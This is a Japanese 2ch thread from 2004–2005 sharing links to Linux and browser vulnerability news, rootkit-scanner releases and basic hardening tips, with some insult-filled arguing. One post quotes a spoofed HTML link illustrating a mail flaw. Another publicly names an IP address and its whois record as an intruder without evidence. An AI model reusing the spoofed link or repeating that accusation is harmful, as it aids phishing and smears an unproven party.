407 :login:Penguin:04/11/18 17:19:34 ID:wovyIy70.net
Linux勧告ウォッチ - 2004年11月12日(金)
http://japan.linux.com/security/04/11/17/0227253.shtml

408 :login:Penguin:04/11/18 21:46:20 ID:4065SAaP.net
玄箱HG買ってきて、NATでsshと
thttpを通して使っていますが、
どの程度脆弱なのか教えてほしい。
付属のバイナリそのままです。

409 :login:Penguin:04/11/19 00:07:37 ID:k0IUrB5V.net
>>408
おまえの脳と同じ位モロヨワ

410 :login:Penguin:04/11/21 18:41:00 ID:YIsvNf8c.net
Samba 3.0.7以前にBuffer Overrunのバグ
http://slashdot.jp/security/04/11/20/2212246.shtml

411 :login:Penguin:04/11/21 23:27:49 ID:nQ1PzIeT.net
>>410
Samba2.2.Xもアウトの模様。
Sambaチームとしては、2.2系はすでにディスコン扱い。

RedHat AS系のsrc.rpmからパッチ抜き出して、手パッチ当てることで対応可能。

お勧めは、3.0系についでにアップデート。

412 :login:Penguin:04/11/22 05:35:50 ID:N1aPDDkr.net
http://slashdot.jp/comments.pl?sid=224264&cid=655792
>対してDebianですが、2.2系のsambaを使っているWoodyに対しては、対応の必要無し [debian.org]としているようです。
>Stefan Esser氏の情報によると、SMB_QUERY_FILE_NAME_INFOとSMB_QUERY_FILE_ALL_INFOへの返答にunicodeが含まれるときにオーバーフローがおこる、としています。
>通信路上でのunicode対応は3.0での新機能であることから、
>2.2系では問題ない、ということのようです。

どっちやねん。

413 :login:Penguin:04/11/22 07:56:05 ID:RCTNbKMu.net
>>412
普通はRed Hatの言う事を信じるだろ

414 :login:Penguin:04/11/22 15:33:17 ID:FhnUWtDM.net
>>412
パッチあてたことによる副作用は(メモリ喰う意外は)ないはず。


415 :login:Penguin:04/11/22 19:39:58 ID:0XykCTIm.net
>>413
Red Hatの言う事って何?

416 :login:Penguin:04/11/24 16:44:02 ID:b7roQRZ3.net
Javaプラグインに「極めて深刻」な脆弱性--WindowsやLinuxに影響
http://japan.cnet.com/news/sec/story/0,2000050480,20076165,00.htm

417 :login:Penguin:04/11/25 00:52:00 ID:ISOyf0NF.net
Linux勧告ウォッチ - 2004年11月19日(金)
http://japan.linux.com/security/04/11/24/0318222.shtml

418 :login:Penguin:04/11/26 04:10:23 ID:k5e8vXSr.net
大学でlinux使ってるんだが自分のPCのホスト名が書き換えられてlocalhost
になってんねんけどこれってハッキングされた??ハッキングされた場合の
対策を教えてください。

419 :login:Penguin:04/11/26 04:22:23 ID:w17TEeR7.net
>>417
あたりまえのことしか書かれてない退屈な記事だが、そんなもんが記事になるほど
常識が通用しない世の中になってるのか
逆にいえば一般に普及しているともいえるが
>>418
判断がつかないようなスキルなら、必要なデータをバックアップして全てのディスクをフォーマット
OSの再インストールが宜しかろう

420 :login:Penguin:04/11/26 12:26:25 ID:bXKAsbvI.net
>>418
もともと設定されていなかったんじゃないか?
Red Hat系のディストリビューションではホスト名をlocalhost.localdomainにしておけば
DHCPやDNSの逆引きで自動的に自分のホスト名を設定する。
起動時にネットワークに継っていないとlocalhostのままになってしまう。

421 :418:04/11/26 20:10:15 ID:k5e8vXSr.net
>>419
Linuxのセキュリティの勉強をして判断できるようになるまでオフラインで作業する事にしました。
インタネットをする時はwindowsでします。

>>420
使ってるのはTurbolinux 10です。4月から使ってるんだけどつい最近になってホスト名が
勝手に変更された。でも今までは再起動すれば元に戻ってた。でもこの前から戻らなくなって
しまったから今は常にオフラインで作業してる

422 :login:Penguin:04/11/26 20:33:42 ID:dnnkHd3Q.net
インタネットをする時

423 :login:Penguin:04/11/26 22:17:36 ID:p8Vafjob.net
まぁいいじゃん

424 :login:Penguin:04/11/29 23:05:26 ID:3iaP6BNg.net
>>421
ipchainsや iptablesとかで、大学内の IPアドレスだけを受け入れる設定にすれば良いんでないの?
Firewallってやつね。

425 :418:04/11/30 04:00:34 ID:0XEsMbzU.net
>>424
ありがとう。早速使ってみます。今まですごい無防備だった・・・。同じ教室内にクラッカーがいる
のはわかってるんだが・・・。LinuxにはNortonみたいな便利なセキュリティソフトはありますか?

426 :login:Penguin:04/11/30 09:52:06 ID:UiU6OPG7.net
全主要ブラウザに影響する脆弱性発見
http://www.itmedia.co.jp/enterprise/articles/0411/30/news007.html

427 :login:Penguin:04/11/30 14:04:42 ID:69iGkjJJ.net
> 代替ブラウザのMozilla Browser、Mozilla Firefox、Opera、Apple Safari
( ゚д゚)ポカーン

428 :424:04/12/01 22:24:36 ID:WZMXvOti.net
>>425
あなたがやられたことは、ウィルスではないからウィルスソフトは関係無いよ。
googoleで linux セキュリティ 等で検索して出たページを眺めてみれば、
何をやれば良いかが分かると思う。


429 :login:Penguin:04/12/02 16:51:45 ID:uIcjRdJU.net
Linux勧告ウォッチ - 2004年11月26日(金)
http://japan.linux.com/security/04/12/02/0312200.shtml

430 :login:Penguin:04/12/03 00:47:06 ID:HAi650+o.net
いわゆるブラクラだろ?>>426

431 :418:04/12/06 04:11:59 ID:m7qkMCab.net
>>428
参考してみます

432 :login:Penguin:04/12/08 08:53:04 ID:6AL/27aH.net
Linux勧告ウォッチ - 2004年12月3日(金)
http://japan.linux.com/security/04/12/07/0944230.shtml

433 :login:Penguin:04/12/09 15:34:07 ID:M1bxsokm.net
Linuxの画像ライブラリimlibに脆弱性
http://www.itmedia.co.jp/news/articles/0412/09/news008.html

434 :login:Penguin:04/12/09 17:37:02 ID:/9Bn7ZUs.net
主要Webブラウザにポップアップウィンドウ偽装の脆弱性、フィッシング詐欺につながるおそれ
http://www.itmedia.co.jp/enterprise/articles/0412/08/news093.html

435 :login:Penguin:04/12/12 11:55:55 ID:mgIoIJ5c.net
MD5の欠陥でファイル整合性に危険信号
http://www.itmedia.co.jp/enterprise/articles/0412/10/news077.html

これとは別物か
http://slashdot.jp/articles/04/08/18/0257220.shtml

436 :login:Penguin:04/12/12 12:09:09 ID:ktUlSgLe.net
同じ物。
終った頃に池沼が騒いでるだけ。

437 :login:Penguin:04/12/15 09:05:03 ID:+nSB8nzE.net
Linux勧告ウォッチ - 2004年12月10日(金)
http://japan.linux.com/security/04/12/14/0246249.shtml

438 :login:Penguin:04/12/15 14:36:32 ID:oedS6vkw.net
861 :名無しさん@お腹いっぱい。 :04/12/15 14:11:54
  Namazu 2.0.14リリース

  タブ(%09)から始まる検索文字列によるXSS脆弱性を修正。
  http://www.namazu.org/security.html#xss-tab

  2.0.13以前での回避策も示されているので速やかに対応すべし。


439 :login:Penguin:04/12/16 16:27:25 ID:falYWNu5.net
PHP 4.3.10 Release

http://www.hardened-php.net/advisories/012004.txt

440 :login:Penguin:04/12/18 14:17:57 ID:BcJcP3Iv.net
一般ユーザーのためのセキュリティ12カ条
http://www.itmedia.co.jp/anchordesk/articles/0412/13/news068.html

くだらん

441 :login:Penguin:04/12/18 15:15:29 ID:tFDALx9R.net
>>440
なんだ、ネタか…

442 :login:Penguin:04/12/18 21:00:03 ID:hjmC5PT7.net
Sambaにリモートからコードを実行されるセキュリティ・ホール
http://itpro.nikkeibp.co.jp/free/ITPro/NEWS/20041217/154015/

443 :login:Penguin:04/12/21 18:36:00 ID:hzu57Fj/.net
GNU wget 1.8.x / 1.9.x に複数の欠陥。
http://www.st.ryukoku.ac.jp/~kjm/security/memo/2004/12.html#20041220_wget

(・∀・)キヲツケロ!

444 :login:Penguin:04/12/21 22:40:47 ID:30PuipQb.net
Linux勧告ウォッチ - 2004年12月17日(金)
http://japan.linux.com/security/04/12/21/0223236.shtml

445 :login:Penguin:04/12/28 20:17:37 ID:gwu6iJyi.net
PHPを狙う新たなワームが出現,Webページのプログラム・ミスを突く
http://itpro.nikkeibp.co.jp/free/ITPro/NEWS/20041227/154332/

446 :login:Penguin:04/12/28 20:18:20 ID:gwu6iJyi.net
いま、ウイルス対策を再考する
http://www.itmedia.co.jp/enterprise/articles/0412/28/news040.html

447 :login:Penguin:04/12/28 20:27:49 ID:wQ0sP7mi.net
不正アクセス者

210.233.171.215
f71-215.knet.ne.jp

Network Information: [ネットワーク情報]
a. [IPネットワークアドレス] 210.233.171.0
b. [ネットワーク名] KNET
f. [組織名] Knet
g. [Organization] Knet
m. [運用責任者] YA2419JP
n. [技術連絡担当者] YA2419JP
p. [ネームサーバ] dns.knet.ad.jp
p. [ネームサーバ] dns2.knet.ad.jp
y. [通知アドレス] nic@knet.ad.jp
[割当年月日] 2004/05/10
[返却年月日]
[最終更新] 2004/05/10 22:02:02 (JST)
ip-alloc@nic.ad.jp




448 :login:Penguin:04/12/28 20:49:11 ID:eKoW9pyP.net
( ゚д゚)ポカーン

449 :login:Penguin:04/12/29 10:41:25 ID:6fSkhuYM.net
28 Dec - Release 1.1.9 available
ttp://www.rootkit.nl/

rkhunter 1.1.9 がリリースされていますよ。
あと、tiffに穴があったみたいですね。

450 :login:Penguin:05/01/01 08:39:13 ID:kFu0LjTp.net
mozillaZine : Mozilla 1.7.3 以前に NNTP セキュリティ問題
ttp://ryuzi.dyndns.org/mozillazine/html/modules/news/article.php?storyid=801

( ´∀`)つキヲツケロー

451 :login:Penguin:05/01/05 21:59:12 ID:ZS0EbUa0.net
Linux勧告ウォッチ - 2004年12月31日(金)
http://japan.linux.com/security/05/01/05/0245202.shtml

452 :login:Penguin:05/01/06 14:02:08 ID:JKxdX/H1.net
MozillaとFirefox、ダウンロード時のダイアログボックスに脆弱性
http://internet.watch.impress.co.jp/cda/news/2005/01/06/5957.html

453 :login:Penguin:05/01/15 00:01:44 ID:0C6Q/s/t.net
Linux勧告ウォッチ - 2005年1月7日(金)
http://japan.cnet.com/news/sec/story/0,2000050480,20080055,00.htm

454 :login:Penguin:05/01/15 00:02:30 ID:0C6Q/s/t.net
Linuxに「極めて深刻」な脆弱性--レッドハット、SuSEらがパッチリリース
http://japan.cnet.com/news/sec/story/0,2000050480,20080055,00.htm

455 :login:Penguin:05/01/16 14:23:16 ID:lk8Mb3iI.net
>>453
URLがCNETになってるYO!

http://japan.linux.com/security/05/01/13/031259.shtml

456 :login:Penguin:05/01/19 01:52:44 ID:sNwJCWuH.net
Linux勧告ウォッチ - 2005年1月14日(金)
http://japan.linux.com/security/05/01/18/0234212.shtml

457 :login:Penguin:05/01/25 19:05:49 ID:sthPlgmU.net
Linux勧告ウォッチ - 2005年1月21日(金)
http://japan.linux.com/security/05/01/25/0320239.shtml

458 :login:Penguin:05/02/03 12:11:45 ID:peK1ruFi.net
Linux勧告ウォッチ - 2005年1月28日(金)
http://japan.linux.com/security/05/02/02/030213.shtml

459 :login:Penguin:05/02/08 16:20:18 ID:3wyRdacD.net
国際化ドメイン名処理に起因する表示偽装の脆弱性、OperaやFirefoxなどに影響
http://www.itmedia.co.jp/enterprise/articles/0502/08/news028.html

460 :login:Penguin:05/02/09 16:46:17 ID:Pnc07aj7.net
SUSE、脆弱性修正のアップデートリリース
http://www.itmedia.co.jp/enterprise/articles/0502/08/news009.html

461 :login:Penguin:05/02/09 17:34:54 ID:+iRiNy7x.net
Linux勧告ウォッチ - 2005年2月4日(金)
http://japan.linux.com/security/05/02/08/0246239.shtml

462 :login:Penguin:05/02/10 23:37:09 ID:4PvXQ5gy.net
Mozillaブラウザを狙う初めてのスパイウェアが出現
http://japan.cnet.com/news/sec/story/0,2000050480,20080614,00.htm

463 :login:Penguin:05/02/11 11:33:23 ID:UCimrSLJ.net
>>462
初めてだっけ?
以前に悪質な広告xpiファイルが出たので
xpiインストール確認が出るようになったって話があったような。

そうそう、rkhunter 1.2.0 が出ていますよみなさん。
ttp://www.rootkit.nl/

464 :login:Penguin:05/02/17 03:53:34 ID:Q0DXFhPR.net
Linux勧告ウォッチ - 2005年2月11日(金)
http://japan.linux.com/security/05/02/15/0318234.shtml

465 :login:Penguin:05/02/18 07:51:34 ID:LveFzv8F.net
>>464
ぉぃ! いつもLinux勧告ウォッチを貼ってる野郎!
てめぇに言っておきたいことがある。

数行ほど、めぼしい情報を拾って合わせて貼って頂けると大変嬉しく思います。
お手数ですが、よろしければ御検討ください。お願いします。

466 :login:Penguin:05/02/21 11:45:53 ID:IDO/D8rZ.net
Web 偽装詐欺 (phishing) の踏み台サーバに関する注意喚起
http://www.jpcert.or.jp/at/2005/at050002.txt

467 :login:Penguin:05/02/21 16:33:50 ID:jXPJgdb6.net
>>466
5年前ならともかく、今ではにわかには信じ難い話だな。
ま、JPCERTだから2chの噂話レベルの信憑性なわけだが。

468 :login:Penguin:05/02/23 12:21:23 ID:xvajs3dF.net
21 Feb - Release 1.2.1 available
ttp://www.rootkit.nl/

469 :login:Penguin:05/02/23 12:23:26 ID:xvajs3dF.net
chkrootkit 0.45 is now available! (Release Date: Tue Feb 22 2005)
ttp://www.chkrootkit.org/

470 :login:Penguin:05/02/25 00:34:04 ID:L1ggRzyl.net
しつこく続いていたsshのスキャンはフィッシング詐欺のサーバ探しだったようだ。
糞パスワード付けていた馬鹿のサーバが侵入されたってわけだ。そこで我が輩の提案。
インスコすると自動的に乱数でパスワードを作って管理者にも変更を認めない。
馬鹿が叛乱する世の中ではこれが一番安全なやりかただと断言できる。

471 :login:Penguin:05/02/25 01:52:57 ID:ma7hFUNy.net
Linux勧告ウォッチ - 2005年2月18日(金)
http://japan.linux.com/security/05/02/24/036217.shtml
>今週は、libXpm、evolution、mailman、hztty、xpcd、sympa、netkit-rwho、toolchain、 htdig、synaestheia、awstats、typespeed、emacs、gftp、python、openoffice、カーネル、 kdeedu、gallery、
>webmin、perl-squid、ht/dig、opera、vmware、lighttpd、kstars、 midnight commander、drakextools、cpio、enscript、mysql、rwho、kdelibs、xpdf、libtiff、vim、 ethereal、thunderbird、squidに関する勧告が公開された。

472 :login:Penguin:05/02/25 11:06:08 ID:6/5GujWC.net
>>471
おつかれさまです。
465じゃないけど、ありがとうございます。

473 :login:Penguin:05/02/25 23:02:08 ID:aF9fIQ+9.net
>>470
パスワードばれたら?

474 :login:Penguin:05/02/25 23:57:14 ID:nVNHoQ2r.net
乱数で作ってるからばれない。
PCの横にマジックで書いといてもネットの向こう側に居る犯罪者にはバレない。
パスワードを漁るために空き巣に入る泥棒は居ない。

475 :login:Penguin:05/02/26 00:24:18 ID:+E3SGsUQ.net
>>474
これでも読んで勉強しなさい!
http://store.sbpnet.jp/bm_detail.asp?sku=479732158X

476 :login:Penguin:05/02/26 00:30:18 ID:v4dMD1U4.net
つまらん勉強ばっかしてるから俺の話が突飛に思えるんだよ馬鹿

477 :login:Penguin:05/02/26 00:37:50 ID:87EVavyd.net
>>474
いやそういう意味ではなくて、たとえば人経由でいったんばれたとして
パスワード変えられないってのはまずくないのかなと。

478 :login:Penguin:05/02/26 00:39:03 ID:E7BoWaSj.net
クマー

479 :login:Penguin:05/02/26 00:55:22 ID:v4dMD1U4.net
>>477
再インスコすればいい。そんな事もわかんないから馬鹿だって言われるんだよ。

480 :login:Penguin:05/02/26 01:07:56 ID:AybKFtPl.net
再インスコは勘弁してくれ。
そういう方式にしといて、それなりにいろいろ分かってないと変更できないような
しくみつくればずいぶんちがうべ。
「サーバーくらいなら初心者でも立てられる」なんて言ってる奴は八割がた
これでツブせるだろうし、踏み台にされる九割がた、そういうアフォだそうだし。

・・・今日も中国から毒電波来てるが、こればっかりはしゃあないか。

481 :login:Penguin:05/02/26 01:24:41 ID:c2CFeCfJ.net
それなりにいろいろ分ってるつもりの馬鹿がチラシの裏で裏技公開とかやっちゃうから駄目

482 :login:Penguin:05/02/26 01:43:08 ID:bbtRE3Tj.net
>>479
おまえ学生かちっこい会社の社員だろ?wあまりの視野の狭さにわらたw

483 :login:Penguin:05/02/26 01:46:01 ID:c2CFeCfJ.net
>>482
その言葉そっくりそのままオマエに返してやろう。視野狭窄は時に命にかかわるぞw

484 :login:Penguin:05/02/26 01:56:34 ID:bbtRE3Tj.net
>>483
なにを返されたのかわからんが?w小学生並だなw

485 :login:Penguin:05/02/26 02:01:19 ID:AybKFtPl.net
ここでも暴れてるし・・・

486 :login:Penguin:05/02/26 02:56:54 ID:3Nqp1acH.net
こんな幼稚なケンカが2ちゃんで見れるとは。

487 :login:Penguin:05/02/26 05:27:36 ID:GMmhlsl5.net
別に珍しくも無いだろ

488 :login:Penguin:05/02/26 09:49:30 ID:zg6TewG9.net
ssh鯖にクライアントの公開鍵を登録して、未登録なアクセスを蹴ればいいじゃん。
もちパスワード認証は×で。

489 :login:Penguin:05/02/26 12:28:27 ID:1ScHd3US.net
そもそも外部に公開するsshサーバーでパスワード認証って危なくないの?
俺LAN内の特定クライアント機以外にssh公開してないけど、鍵暗号方式のみで認証させてる。

490 :login:Penguin:05/02/26 14:06:59 ID:MynstDZ4.net
おまえらって幼稚だな。

491 :login:Penguin:05/02/26 15:36:06 ID:SCEXoWRR.net
>>490
(´∀` )オマエモナー

492 :login:Penguin:05/02/27 20:51:31 ID:g6Gg6hli.net
もうすぐは〜るですねぇ、っとくりゃ。

493 :login:Penguin:05/03/03 06:03:49 ID:lCP0zlq9.net
Linux勧告ウォッチ - 2005年2月25日(金)
http://japan.linux.com/security/05/03/02/0241203.shtml
>今週は、emacs、gftp、bidwatcher、mailman、squid、mod_python、kdeedu、gamin、pcmcia、 openssh、postgresql、gimp、
>midnight commander、gproftpd、cyrus imap、cups、kdelibs、xpdf、uim、cpio、vimに関する勧告が公開された。

494 :こっちにも貼り:05/03/05 22:12:03 ID:eLHKfgTQ.net
http://slashdot.jp/security/05/03/05/1257255.shtml
Sylpheed にバッファオーバーフローの問題


495 :login:Penguin:05/03/09 20:24:41 ID:shF6sxJU.net
Linux勧告ウォッチ - 2005年3月4日(金)
http://japan.linux.com/security/05/03/09/0256229.shtml
>今週は、mod_python、bsmtpd、gaim、bind、gnucash、dhcp、at、vixie-cron、lam、pvm、 radvd、selinux-targeted- policy、tcsh、openoffice、gamin、cmd5checkpw、
>uim、UnAce、MediaWiki、phpBB、 phpWebSite、xli、xloadimage、firefox、squid、kdenetwork、nvidia、curl、uw-imap、 cyrus-saslに関する勧告が公開された。

496 :login:Penguin:05/03/15 16:35:59 ID:9Sx4GV1E.net
Linux勧告ウォッチ - 2005年3月11日(金)
http://japan.linux.com/security/05/03/15/017205.shtml
>今週は、clamav、カーネル、squid、kppp、helixplayer、tzdata、libtool、firefox、ipsec- tools、dmraid、gaim、libexif、gimp、yum、
>grip、libXpm、xv、ImageMagick、Hashcash、 mlterm、dcoidlng、curl、gftp、cyrus-imapd、unixODBC、mcに関する勧告が公開された。

497 :login:Penguin:05/03/16 22:22:17 ID:03P5AesU.net
サーバー・ソフト「Tomcat 3.x」にDoS攻撃を受けるセキュリティ・ホール
http://itpro.nikkeibp.co.jp/free/ITPro/NEWS/20050314/157411/

498 :login:Penguin:05/03/16 22:28:36 ID:6KgSXSMv.net
>埋めとけよ

埋め方って

apt-get update

でいいんでつか?

499 :login:Penguin:05/03/16 22:48:44 ID:MisSkqnV.net
>>498
Vine房は公式ページを隅まで100回読め

500 :login:Penguin:05/03/17 13:47:31 ID:T8FRXtHe.net
>>498
apt-get update;apt-get upgrade
でございます。

501 :login:Penguin:05/03/19 19:27:29 ID:JQvXGr6m.net
rkhunter 1.2.2

502 :login:Penguin:05/03/19 22:26:12 ID:7BX5g21/.net


503 :login:Penguin:2005/03/21(月) 17:45:22 ID:NlC7yEaj.net
vsftpd 2.0.3

504 :login:Penguin:2005/03/22(火) 20:32:02 ID:mBR0rAyi.net
rkhunter 1.2.3

505 :ogin:Penguin:2005/03/24(木) 14:06:04 ID:P8wluaHW.net
OpenSSL 0.9.7f

506 :login:Penguin:2005/03/25(金) 02:06:27 ID:nHb4C2sO.net
nessus 2.2.4

507 :login:Penguin:2005/04/05(火) 08:51:04 ID:oXj0aGCx.net
「PHP 5.0.4」「同4.3.11」が公開に,DoS攻撃に悪用されるぜい弱性を修正
http://itpro.nikkeibp.co.jp/free/ITPro/USNEWS/20050404/158405/

508 :login:Penguin:2005/04/05(火) 19:35:28 ID:WbnW/bJO.net
FirefoxのJavaScriptエンジンに脆弱性
http://www.itmedia.co.jp/enterprise/articles/0504/05/news023.html

509 :login:Penguin:2005/04/06(水) 15:45:49 ID:o4XbggVk.net
Linux勧告ウォッチ - 2005年4月1日(金)
http://japan.linux.com/security/05/04/06/0047246.shtml
>今週は、ethereal、カーネル、netkit-telnet、mc、mailreader、samba、mozilla、lsof、 thunderbird、epiphany、devhelp、spamassassin、slypheed、
>krb5、xorg、telnet、 foomatic、squid、ImageMagick、gdk、mpg321、ipsec-tools、htdig、grip、mysql、 XFree86、MySQLに関する勧告が公開された。

510 :login:Penguin:2005/04/09(土) 20:20:07 ID:gw8csAi8.net
clamav 0.84rc1

511 :login:Penguin:2005/04/12(火) 14:05:43 ID:ZkK3ZrD8.net
Linux勧告ウォッチ - 2005年4月8日(金)
http://japan.linux.com/security/05/04/12/0257227.shtml
>今週は、MySQL、samba、ImageMagick、krb5、remstats、wu-ftpd、sharutils、util-linux、 words、gaim、e2fsprogs、
>subversion、ipsec-tools、libexif、htdig、grip、gtk2、 tetex、curl、gdk-pixbuf、XFree86に関する勧告が公開された。

512 :login:Penguin:2005/04/13(水) 20:31:12 ID:zZYvdEdV.net
OpenSSL 0.9.7g

513 :login:Penguin:2005/04/14(木) 01:30:08 ID:vR5vsyXy.net
影響はWindows以外にも――広範な製品のTCP/IP実装に脆弱性
http://www.itmedia.co.jp/enterprise/articles/0504/13/news096.html

OpenOfficeに脆弱性、該当ライブラリを差し替えるパッチはまもなく正式公開
http://www.itmedia.co.jp/enterprise/articles/0504/13/news084.html

514 :login:Penguin:2005/04/16(土) 11:11:08 ID:KWWS1+Kz.net

またOOoか!!!!

ttp://internet.watch.impress.co.jp/cda/news/2005/04/12/7247.html





515 :login:Penguin:2005/04/16(土) 20:28:59 ID:HRup7FY4.net
三つの致命的欠陥を修正したFirefox 1.0.3とMozilla 1.7.7リリース
http://slashdot.jp/article.pl?sid=05/04/16/0754215&topic=51

516 :login:Penguin:2005/04/18(月) 16:02:40 ID:PIkwm5sQ.net
>>515関連
http://internet.watch.impress.co.jp/cda/news/2005/04/18/7319.html

517 :login:Penguin:2005/04/20(水) 02:08:54 ID:/NpjNEUV.net
Linux勧告ウォッチ - 2005年4月15日(金)
http://japan.linux.com/security/05/04/19/0255215.shtml
>今週は、axel、gftp、wireless-tools、glibc、selinux-policy-targeted、カーネル、autofs、 GnomeVFS、
>phpMyAdmin、shorewall、gtk、shareutils、gdk-buf、kdegraphics、dhcp、 gaimに関する勧告が公開された。

518 :login:Penguin:2005/04/24(日) 19:00:48 ID:/AT7UwWG.net
cvsのdebianパッチまだ〜?

519 :login:Penguin:2005/04/28(木) 15:48:21 ID:4g8dKA1q.net
Linux勧告ウォッチ - 2005年4月22日(金)
http://japan.linux.com/security/05/04/26/0149236.shtml
>今週は、MySQL、PHP、libexif、gtkhtml、info2www、geneweb、f2c、XFCE、vixie-cron、at、 nasm、aspell、urw-fonts、htdig、alsa-lib、
>curl、HelixPlayer、cvs、foomatic、 monkeyd、mplayer、xloadimage、logwatch、カーネル、OpenOffice、PostgreSQLに関する勧告が公開された。

520 :login:Penguin:2005/04/28(木) 16:51:43 ID:4g8dKA1q.net
Mozillaで修復済みの脆弱性、Netscapeブラウザは未対応
http://www.itmedia.co.jp/enterprise/articles/0504/27/news024.html

521 :login:Penguin:2005/05/03(火) 01:44:32 ID:Iw9fmQYW.net
Linux勧告ウォッチ - 2005年4月29日(金)
http://japan.linux.com/security/05/05/02/057236.shtml
>今週は、squid、gaim、evolution、junkbuster、samba、cvs、kdelibs、libtiff、mc、dia、 cyrus、ImageMagik、
>openMosixview、kimgio、convert-UUlib、カーネル、shareutils、 mozillaに関する勧告が公開された。

522 :login:Penguin:2005/05/09(月) 13:33:11 ID:3POvZzAZ.net
Mozilla Firefox1.0.3に最高レベルの脆弱性
http://slashdot.jp/security/05/05/09/0327254.shtml

523 :login:Penguin:2005/05/10(火) 21:50:38 ID:BSxLP988.net
>>522と同じ話

http://www.forest.impress.co.jp/article/2005/05/09/fftwovulnerability.html

524 :login:Penguin:2005/05/11(水) 22:31:37 ID:eArb38Vi.net
RootKit Hunter 1.2.6

525 :login:Penguin:2005/05/18(水) 19:44:52 ID:IKEgOcIP.net
Linux勧告ウォッチ - 2005年5月13日(金)
http://japan.linux.com/security/05/05/17/0152202.shtml
>今週は、squid、smail、XFree86、lapack、system-config-bind、gnutls、util-linux、 libexif、ethereal、
>postgresql、gaim、pygtk、GnuTLS、gzip、TCPDump、libTIFF、HT、 openmotifに関する勧告が公開された。

526 :login:Penguin:2005/05/20(金) 03:07:32 ID:dcSABdhI.net
複数のWikiクローンのファイル添付機能にXSSな脆弱性
http://slashdot.jp/security/05/05/19/088246.shtml

527 :login:Penguin:2005/05/22(日) 00:22:51 ID:duekTQwd.net
「Outlook」v97〜2003に記載と異なるURLへリンクしたメールを作成できる脆弱性
http://www.forest.impress.co.jp/article/2005/05/20/outlookurlspoof.html

これが脆弱性だとするとMewにも脆弱性が存在することになってしまうわけだが

528 :login:Penguin:2005/05/22(日) 01:18:14 ID:09Qd3650.net
↑なにかと思って見たら
<a href="ttp://example.com/">ttp://www.forest.impress.co.jp/</a>
こんなのか。

529 :login:Penguin:2005/05/22(日) 12:48:25 ID:uYohhMZ/.net
HTMLメールには脆弱性があるって事だな

530 :login:Penguin:2005/05/22(日) 15:26:31 ID:BdkNpKZc.net
Linuxをセキュアにする 第3回: システムを強化する
http://www-6.ibm.com/jp/developerworks/linux/050513/j_l-seclnx3.html

531 :login:Penguin:2005/05/22(日) 15:30:09 ID:BdkNpKZc.net
Netscape 8公開直後に脆弱性修正のアップデート
http://www.itmedia.co.jp/enterprise/articles/0505/21/news007.html

532 :login:Penguin:2005/05/22(日) 16:57:43 ID:/Q+FASDW.net
>531
Windows 向けしか出てないと思ってたけど、私の勘違い?

533 :login:Penguin:2005/05/23(月) 15:13:19 ID:c/rCnFQu.net
>>532
他のOSへの対応は捨てられたみたいですね。
Netscapeのウリだったと思うんですが。

534 :login:Penguin:2005/05/23(月) 15:22:55 ID:CA1JGWbI.net
>>533
そもそもWindows以外のOSのユーザでFirefoxでもMozillaでもなくNetscapeを
使ってたユーザなんていたのだろうか・・・

535 :login:Penguin:2005/05/23(月) 15:47:58 ID:jyerwz/3.net
発表直後の「Netscape 8」に脆弱性--ネットスケープがアップデートを公開
http://japan.cnet.com/news/sec/story/0,2000050480,20083753,00.htm

言い訳(・A・)イクイナ!!

536 :login:Penguin:2005/05/23(月) 18:49:25 ID:w6WFU2h5.net
>>534
普通にいるべ。Solaris でも使うし、*BSD でも使うべ。

537 :login:Penguin:2005/05/23(月) 19:56:39 ID:CA1JGWbI.net
>>536
いやいや、4.xまでは対応するMozilla側が安定してなかったりで
使う理由がわかるんだけど、6.x以降は使う意味があるのかな、と。

# そもそも6.x以降はWindows, Linux, Macしか選択肢がないが

538 :login:Penguin:2005/05/26(木) 00:15:53 ID:8RgdaCKa.net
DNSプロトコル実装に脆弱性――DoS攻撃の可能性も
http://www.itmedia.co.jp/enterprise/articles/0505/25/news019.html

539 :login:Penguin:2005/05/26(木) 00:40:00 ID:/5UYL0aS.net
PowerDNSだけの問題のようだな。まったく思わせぶりなんだから。

540 :login:Penguin:2005/05/29(日) 00:03:12 ID:qBEsDcGc.net
メールクライアントソフトにおける mailto URL scheme の不適切な解釈
http://jvn.jp/jp/JVN%23FCAD9BD8/index.html

# Sylpheed は svn trunk (rev.294) で修正された模様
# > * src/compose.c: compose_entries_set(): don't interpret Bcc header
# > field (conform to RFC 2368).

541 :login:Penguin:2005/05/30(月) 02:56:47 ID:gta4/fiU.net
俺のセキュリティーホールはもう手遅れです

542 :login:Penguin:2005/05/30(月) 05:43:38 ID:WjRbGfEL.net
彼女のセキュリティーホールを突破しました

543 :Rootkit Hunter:2005/05/30(月) 08:24:22 ID:e8mjI1GO.net
> 24 May - Version 1.2.7 available
> A new version with another update for the databases
> updater and additional OS support.

544 :login:Penguin:2005/06/02(木) 15:18:15 ID:8KgKc3tF.net
Linux勧告ウォッチ - 2005年5月27日(金)
http://japan.linux.com/security/05/05/31/0240205.shtml
>今週は、ppxp、oops、libconvert、qpopper、gail、dmraid、openssl、カーネル、netpbm、sudo、 texinfo、FreeRADIUS、
>gdb、ImageMagick、Net-SNMP、gxine、evolution、firefox、 mozilla、ethereal、lesstifに関する勧告が公開された。

545 :login:Penguin:2005/06/03(金) 21:36:27 ID:TJxSbhU/.net
Linux Advisory Watch - June 3rd 2005
http://security.linux.com/security/05/06/03/128213.shtml
>This week, advisories were released for qpopper, openssl, php4, bzip2,
>ImageMagick, bind, netpbm, gxine, imap4d, elfutils, gnutls, and postgresql.

546 :login:Penguin:2005/06/06(月) 20:00:57 ID:nf/+mWXF.net
ttp://www.openssh.com/ja/
OpenSSH 4.1 がリリースされました (2005年 5月 26日)。


547 :login:Penguin:2005/06/06(月) 23:17:18 ID:1/IasyVS.net
Mozilla/Mozilla Firefoxの脆弱性が再発
http://slashdot.jp/security/05/06/06/1146249.shtml

548 :login:Penguin:2005/06/07(火) 10:51:48 ID:TIwnPZi0.net
>>547
Mozilla/Firefoxに修正したはずのセキュリティ・ホールが“復活”,サイトの偽装を許す : IT Pro ニュース
http://itpro.nikkeibp.co.jp/free/ITPro/NEWS/20050606/162208/

記事の終りにこんなものが。

なお今回のセキュリティ・ホールは,Internet Explorer(IE)やOpera,Netscapeといった複数のブラウザに見つかっている(関連記事)。
その後,例えばOperaはバージョン 7.52で,Netscapeはバージョン 7.2で修正された。
冒頭で書いたように,FirefoxとMozillaも修正されたものの,最近のバージョンで再び確認された。
IEについては,修正パッチなどが提供されないまま現在に至っている。


549 :login:Penguin:2005/06/10(金) 03:33:22 ID:8e+dMorF.net
RSS配信はセキュリティ上危険か
http://japan.linux.com/security/05/06/09/0242203.shtml

